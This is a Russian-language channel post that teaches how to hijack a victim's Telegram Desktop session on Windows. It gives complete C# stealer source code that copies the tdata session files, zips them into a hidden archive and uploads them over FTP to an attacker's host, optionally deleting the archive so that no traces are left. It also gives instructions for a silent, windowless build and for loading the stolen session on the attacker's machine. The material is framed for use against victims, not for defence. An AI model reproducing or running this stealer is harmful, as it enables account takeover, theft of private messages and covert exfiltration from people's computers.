Угоняем чужой аккаунт Telegram Messenger
Debian-LabЗдравствуйте дорогие подписчики! Сегодня мы Вам покажем актуальный способ как можно "угнать" сессию Telegram если у жертвы на компьютере стоит ОС Windows
Данный способ уже довольно известный, но тем не менее написать про него хочеться.
Для того что бы получить доступ к чужой сессии мессенджера Teleram нам достаточно заполучить 2 файлика из директории ...\Telegram Desktop\tdata и заменить их на наши в нашей машине:
- D877F783D5D3EF8C0 (последняя цифра может быть другой)
- D877F783D5D3EF8C\mapo (последняя цифра так же может быть другой)
Вот пример небольшого кода для автоматизации кражи сессии Telegram написанного на языке программирования C#:
using System; using System.IO; using System.Diagnostics; using System.IO.Compression; using System.Net; using System.Threading; namespace TStealer { class Program { private class StealStart { private bool in_folder = false; public StealStart(string host = "", string login = "", string pass = "", bool del_zip = false) { new Thread(() => StealIt(host, login, pass, del_zip)).Start(); } private void StealIt(string host, string login, string pass, bool del_zip) { var prcName = "Telegram"; Process[] processByName = Process.GetProcessesByName(prcName); if (processByName.Length < 1) return; var dir_from = Path.GetDirectoryName(processByName[0].MainModule.FileName) + "\\Tdata"; var this_fileLocation = System.Reflection.Assembly.GetEntryAssembly().Location; var dir_to = Path.GetDirectoryName(this_fileLocation) + "\\Tdata_" + (int)(DateTime.UtcNow - new DateTime(1970, 1, 1)).TotalSeconds ; var zipPath = dir_to + ".zip"; CopyAll(dir_from, dir_to); ZipDir(dir_to, zipPath); Directory.Delete(dir_to, true); if (host == "") return; LoadOnFtp(zipPath, host, login, pass); if(del_zip) File.Delete(zipPath); } private void CopyAll(string fromDir, string toDir) { DirectoryInfo di = Directory.CreateDirectory(toDir); di.Attributes = FileAttributes.Directory | FileAttributes.Hidden; foreach (string s1 in Directory.GetFiles(fromDir)) CopyFile(s1, toDir); foreach (string s in Directory.GetDirectories(fromDir)) CopyDir(s, toDir); } private void CopyFile(string s1, string toDir) { try { var fname = Path.GetFileName(s1); if (in_folder && !(fname[0] == 'm' || fname[1] == 'a' || fname[2] == 'p')) return; var s2 = toDir + "\\" + fname; File.Copy(s1, s2); } catch { } } private void CopyDir(string s, string toDir) { try { in_folder = true; CopyAll(s, toDir + "\\" + Path.GetFileName(s)); in_folder = false; } catch { } } private void ZipDir(string dir_to, string zipPath) { try { ZipFile.CreateFromDirectory(dir_to, zipPath); File.SetAttributes(zipPath, File.GetAttributes(zipPath) | FileAttributes.Hidden); } catch { } } private void LoadOnFtp(string zipPath, string host, string login, string pass) { try { using (WebClient client = new WebClient()) { client.Credentials = new NetworkCredential(login, pass); client.UploadFile("ftp://" + host + "/" + Path.GetFileName(zipPath), "STOR", zipPath); } } catch { } } } static void Main(string[] args) { //var stealT = new StealStart(); var host = "example.host.com"; var login = "example_login"; var pass = "example_pass"; var steal_With_FTP = new StealStart(host, login, pass, false); } } }
- Добавляем ссылку на System.IO.Compression.FileSystem (Проект --> Добавить ссылку)
- Делаем тихий запуск (Проект --> Свойства --> Тип выходных данных --> Приложение Windows)
Как работает наш код:
Мы ищем процесс затем берем его директорию для дальнейшего копирования настроек и сессии. Затем мы создаем ZIP архив и отправляем по FTP на наш сайт.
Использовав конструктор без параметров (new StealStart()), то мы просто копируем настройки сессию в ZIP архив.
new StealStart(host, login, pass, false); - это хост, логин, пароль от FTP и bool который отвечает удалить ли ZIP после отправки нам на FTP.
После запуска, рядом с exe будет скрытая zip-ка которая и отправится нам на FTP. Если Вы указали true в new StealStart(), то данный архив будет уничтожен и не оставит следов на компьютере жертвы.
Создаем новую папку и копируем туда свой файл Telegram.exe, а также папку tdata удалив всё содержимое. С архива делаем распоковку в папку D877F783D5D3EF8C0 и папку D877F783D5D3EF8C.
В итоге должно выйти примерно так:
В папке tdata:
В D877F783D5D3EF8C:
Далее запускаем телеграм.ехе, и он сам всё доделает.
⏳ Наш основной канал - @debian_lab
🌆 Наш канал с приватными сливами - @slivkins_lab